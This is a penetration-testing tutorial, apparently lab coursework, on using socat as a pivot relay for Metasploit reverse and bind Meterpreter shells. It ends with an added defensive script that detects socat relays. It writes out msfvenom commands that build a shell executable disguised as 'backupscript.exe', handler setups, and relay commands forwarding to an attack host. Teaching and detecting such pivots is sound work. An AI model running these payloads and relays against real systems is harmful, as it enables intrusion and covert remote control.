# Playing Pong with Socat

## Socat Redirection with a Reverse Shell

[Socat](https://linux.die.net/man/1/socat) is a bidirectional relay tool that can create pipe sockets between two independent network channels without needing SSH tunneling.

We can start Metasploit's listener using the same command mentioned in the last section on our attack host, and we can start `socat` on the Ubuntu server.

```bash
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
```

Socat will listen on port `8080` on the host where it runs (the Ubuntu server) and forward all the traffic to port `80` on our attack host (`10.10.14.18`).

We then create a payload for the Windows target that points at the Ubuntu server running socat, and start our `multi_handler` on the attack machine.

```bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080
```

The handler must listen on port `80`, because that is the port socat forwards to on our attack host.

```shell-session
sudo msfconsole

msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run
```

We can test this by running our payload on the Windows host again, and we should see a network connection from the Ubuntu server this time.

## Socat Redirection with a Bind Shell

As with the socat reverse shell redirector, we can also create a socat bind shell redirector. This differs from the reverse shell case, where the connection goes back from the Windows server to the Ubuntu server and gets redirected to our attack host.

In the case of bind shells, the Windows server will start a listener and bind to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.

At the same time, we can create a socat redirector on the Ubuntu server, which will listen for incoming connections from a Metasploit bind handler and forward them to the bind shell payload on the Windows target. The figure below illustrates the pivot.

<figure><img src="/files/zfqRboPHMzBXI6Gk66Rr" alt=""><figcaption></figcaption></figure>

**Creating the Windows Payload**

```bash
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
```

We can start a `socat bind shell` listener, which listens on port `8080` and forwards packets to port `8443` on the Windows server.

```shell-session
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
```

`172.16.5.19` is the IP address of the Windows host.

```shell-session
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64
set LPORT 8080
run
```

**Establishing Meterpreter Session**

```shell-session
meterpreter > getuid
```
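
Both redirectors above leave a long-running `socat` process on the Ubuntu server whose command line names the listening port and the forward target. The following is an added example, not part of the original page, that picks such TCP-to-TCP relays out of a process listing; the function names, PIDs and the non-relay sample lines are assumptions made for illustration.

```bash
#!/bin/sh
# Added example: flag socat TCP-to-TCP relays in a process listing.

# Constructed sample in `ps -eo pid,args` layout. The two relay lines reuse
# the commands from this page; the PIDs and other processes are made up.
sample_ps() {
cat <<'EOF'
  PID COMMAND
  812 /usr/sbin/sshd -D
 2041 socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
 2077 /usr/bin/socat tcp4-listen:8080,fork tcp4:172.16.5.19:8443
 2102 socat TCP4-LISTEN:9000,fork UNIX-CONNECT:/run/app.sock
 2150 socat - UNIX-CONNECT:/run/haproxy.sock
EOF
}

# Reads "PID COMMAND ARGS..." lines on stdin and prints, per relay:
#   pid=<pid> listen=<port> forward=<host>:<port>
find_socat_relays() {
    awk '
    {
        # $2 is the executable: accept "socat" or any path ending in /socat
        n = split($2, path, "/")
        if (n == 0 || path[n] != "socat") next

        listen = ""; dest = ""
        for (i = 3; i <= NF; i++) {
            addr = toupper($i)            # socat address keywords are case-insensitive
            if (addr ~ /^TCP[46]?-LISTEN:/) {
                split($i, parts, ":")     # TCP4-LISTEN:8080,fork
                split(parts[2], opts, ",")
                listen = opts[1]          # -> 8080
            } else if (addr ~ /^TCP[46]?:/) {
                rest = substr($i, index($i, ":") + 1)   # 10.10.14.18:80[,opts]
                split(rest, opts, ",")
                dest = opts[1]
            }
        }
        # A TCP listener paired with an outbound TCP address is a relay
        if (listen != "" && dest != "")
            printf "pid=%s listen=%s forward=%s\n", $1, listen, dest
    }'
}

sample_ps | find_socat_relays
```

On a live host the input would come from `ps -eo pid,args`. A renamed binary defeats the name match, so this check is best paired with a review of listening sockets.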

